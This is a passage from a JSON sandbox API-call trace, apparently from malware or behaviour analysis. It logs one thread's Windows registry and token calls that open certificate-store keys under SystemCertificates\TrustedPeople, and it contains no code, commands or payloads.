"timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1725 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1726 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86ce", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1727 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1728 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1729 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 1730 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1731 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1732 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1733 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1734 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1735 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1736 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1737 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1738 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1739 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "8\\xf0[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xcb \\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v/\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00T\\xf0[\\x05`\\xf1[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xd0\\xf0[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's \\xf1[\\x05\\x83 \\xd6\\xfa\\x04\\xec[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x1c\\xf1[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\\\xf1[\\x05\\xc0\\xf3|\\xf1\\x1c\\xf1\\x0c\\xf1\\x80\\xf1\\x00\\x00<\\xff\\x00\\x00\\xc0\\xf3[\\x05|\\xf1[\\x05\\x80\\xf1[\\x05\\x00\\x00\\x00\\x000\\xf1[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\\\xf1[\\x05" + } + ], + "repeated": 0, + "id": 1740 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1741 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1742 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1743 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1744 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86ce", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000054c" + } + ], + "repeated": 0, + "id": 1745 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000054c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\" + } + ], + "repeated": 0, + "id": 1746 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1747 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1748 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1749 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1750 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1751 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1752 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1753 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1754 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1755 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1756 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1757 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1758 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1759 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1760 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1761 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "P\\xee[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xe3>\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v+\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00l\\xee[\\x05x\\xef[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xe8\\xee[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's8\\xef[\\x05\\x9b>\\xd6\\xfa\\x1c\\xea[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff4\\xef[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%st\\xef[\\x05\\xdc\\xf1\\x94\\xef4\\xef$\\xef\\x98\\xef\\x00\\x00<\\xff\\x00\\x00\\xdc\\xf1[\\x05\\x94\\xef[\\x05\\x98\\xef[\\x05\\x00\\x00\\x00\\x00H\\xef[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00t\\xef[\\x05" + } + ], + "repeated": 0, + "id": 1762 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1763 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1764 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1765 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\" + } + ], + "repeated": 0, + "id": 1766 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1767 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000540" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1768 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1769 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1770 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1771 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1772 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1773 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1774 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": 